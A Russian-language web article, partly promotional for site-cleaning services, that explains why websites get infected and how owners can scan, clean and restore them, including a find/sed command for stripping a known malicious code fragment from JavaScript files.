Как удалить вирусы с сайта?

Если вы заметили нарушения в работе сайта, следует срочно проверить его на наличие вирусов. Если они обнаружены, то необходимо их удалить, почистив сайт. Как это сделать?

Есть два варианта:

  • выполнить самостоятельно;
  • доверить работу профессионалам.

В том случае, если вы выбираете первый вариант:

  • Получите на хостинге реквизиты FTP доступа к своему сайту.
  • Используя FTP доступ, получите локальную копию размещенных на хостинге сайта файлов и сохраните ее как резервную.
  • При помощи антивирусной программы или специально разработанных сканеров (AI-Bolit, Manul и др.) проверьте файлы на наличие вирусов.

Внимание! Использование обычного компьютерного антивируса может вместо лечения файла привести к его удалению, что сделает некорректной работу сайта.

  • После получения отчета о сканировании (или проверке антивирусом), который содержит список файлов, пораженных вирусом, внесите изменения в каждый файл из списка. Суть замены заключается в удалении части кода, выделенного антивирусом.

Очень важно выполнить изменения во всех файлах, выделенных при сканировании, независимо от их количества.

  • Для того, чтобы убедиться, что все файлы исправлены, — запустите повторную проверку. Если это необходимо – снова внесите изменение в каждый, обнаруженный сканером, файл. Если же при повторном сканировании вирусы не обнаружены, файлы можно снова переписать на хостинг.
  • По окончании работ следует проверить работоспособность сайта в целом. Для этого необходимо отправить заявку на перепроверку безопасности через Google.Webmaster (Yandex.Webmaster). Если все работы были выполнены правильно, пометка о наличии вирусов исчезнет.

Мы постарались наиболее кратко описать каждый шаг решения проблемы. Как видите, при наличии свободного времени и желании (возможности) разобраться можно.

Еще один вариант – обратиться за помощью к специалистам. Доверив удаление вирусов профессионалам, вы избавите себя от дополнительных хлопот по обустройству и корректной работе сайта.

Мы поможем очистить сайт от вирусов любой степени сложности и обеспечим его надежную защиту.

www.secbot.org

Обнаружение и устранение вирусов на сайте. Что делать при заражении. Как вылечить сайт. Хостинг в деталях

Сайт - это набор файлов, размещенных на постоянно подключенном к интернету сервере. Соответственно, под «вирусами на сайтах» подразумеваются программы или вредоносные включения в файлы сайта, из-за которых сайт работает не так, как он должен работать. Что делать, если ваш сайт заражен?

Каковы причины заражения сайтов?

Основная причина заражения сайтов - это желание заработать за чужой счет. Схема обычно выглядит так: пользователь, зашедший на зараженный сайт, принудительно перенаправляется на сторонний ресурс, не имеющий к исходному никакого отношения (например, на платник партнерской программы). Злоумышленник получает деньги за трафик, перенаправляемый со взломанных сайтов.

Некоторые сайты взламываются ради распространения среди пользователей классических вирусов и формирования ботнетов. Как правило, такие сайты блокируются поисковыми системами, и пользователи при обращении к подобным ресурсам видят предупреждение о том, что сайт заражен. Популярные поисковые системы предоставляют сервис почтовых извещений о заражении ваших сайтов: webmaster.yandex.ru, google.com/webmasters.

Что делать при заражении или взломе сайта? Кто виноват?

Если ваш сайт заражен, не стоит паниковать и мучать своего хостера гневными обвинениями. В 90% случаев хостер к этой проблеме не имеет никакого отношения.

Но всё-таки можно уточнить у своего провайдера, имеет ли проблема массовый характер, или возникла только на вашем сайте. Если сайт размещен на shared-хостинге с общим IP-адресом, можно найти сайты соседей, например с помощью сервиса xseo.in, и проверить, заражены ли они.

Если проблема затронула только ваши сайты, нужно исследовать, при каких обстоятельствах возникла проблема, и начать ее решение самостоятельно. Самые частые способы заражения сайта - похищение пароля FTP-доступа к хостингу с компьютера веб-мастера с помощью кейлоггера, из менеджера паролей или из взломанного почтового ящика, а также использование уязвимостей популярных систем управления сайтом (CMS) и скриптов.

Первым делом стоит обновить антивирус и выполнить полную проверку собственного компьютера на вирусы. Бесплатные программы HiJackThis, Dr.Web CureIt!, AVZ помогут найти даже ту заразу, которая не была обнаружена обычным антивирусом.

После сканирования (и лечения, если требуется) смените пароли доступа к электронной почте, аккаунту на хостинге, и удалите все сохраненные пароли из браузеров и FTP-клиентов.

Загрузите резервную копию зараженного сайта на собственный компьютер, и проверьте ее антивирусом и упомянутыми выше утилитами - иногда даже такая простая мера находит источник проблемы.

Полезным является бесплатный скрипт AI-Bolit. Он умеет искать вирусы, редиректы на сторонние сайты, дорвеи код ссылочных бирж, директории, открытые на запись для всех и др. После проверки скрипт выведет список подозрений на вредоносные включения, которые можно будет проверить и устранить вручную, отредактировав исходные коды файлов сайта.

Если сайт построен на популярной CMS (особенно DLE, Wordpress и Joomla), то возможно злоумышленник воспользовался ее уязвимостью. Это значит, что нужно обновить CMS и ее модули до последних стабильных версий из официальных источников, отключить неиспользуемые или подозрительные модули, закрыть доступ к административным частям сайта с помощью .htpasswd (или с помощью панели управления хостингом), а также периодически проводить аудит безопасности сайта и менять административные пароли.

Обязательно нужно проверить логи доступа к веб-серверу на предмет посторонних запросов.

Также нужно проверить временные директории CMS, и директории, в которые разрешена загрузка файлов (tmp, cache, images, uploads, user_files и так далее) на предмет посторонних файлов, а также попросить хостера проверить общую временную директорию сервера (обычно это /tmp).

Как удалить вредоносные включения?

Для удаления вредоносных включений удобно использовать возможности консоли сервера (доступ по SSH). Большинство хостинг-провайдеров предоставляет данную возможность по умолчанию или же по обоснованному запросу.

Допустим, мы знаем, что заражены все .js файлы, и у нас есть фрагмент вредоносного кода. Значит, нужно найти все .js файлы и вырезать вредоносный код. Сделать это можно с помощью следующей несложной команды, запустить которую нужно из текущей директории сайта:

find ./ -name '*.js' -exec sed -ie 's|вредоносный_код||g' {} \;

Команда выполняет поиск всех js-файлов, и для каждого найденного файла с помощью утилиты sed заменяет вредоносный код на пустое место. Обратите внимание, что при указании вредоносного кода нужно экранировать специальные символы (` ~ ! @ # $ % ^ & * ( ) _ — [ ] { } : ; ' " / \ > <) с помощью обратного слеша: \ , чтобы оболочка воспринимала их именно как символы, а не как инструкции.

Многие провайдеры могут выполнить подобные действия по вашему запросу, часто даже бесплатно.

В заключение, полезные советы:

  • В процессе решения проблемы взлома сайта, если нет возможности заблокировать к нему доступ посетителей, заблокируйте хотя бы запросы POST, чтобы злоумышленники не хотя бы не могли применить стандартные эксплойты.
  • Не используйте устаревшие версии CMS и плагинов к ним. Следите за обновлениями.
  • После определения причины заражения сайта не ограничивайтесь только одним лишь его лечением, так как добавленные злоумышленником точки проникновения могут быть хорошо скрыты. Проверьте всё, что кажется вам подозрительным.
  • Лучшая схема восстановления сайта после взлома - это закрыть к нему доступ посетителей, найти причину взлома, восстановить сайт из резервной копии (этим мы исключаем любые изменения сайта, которые мог произвести злоумышленник), обновить CMS, убедившись, что уязвимый компонент также обновился, после чего снова открыть доступ к сайту.
  • Регулярно проводите аудит безопасности. Даже еженедельная профилактика займет меньше времени, чем решение проблемы после ее возникновения.

hosting101.ru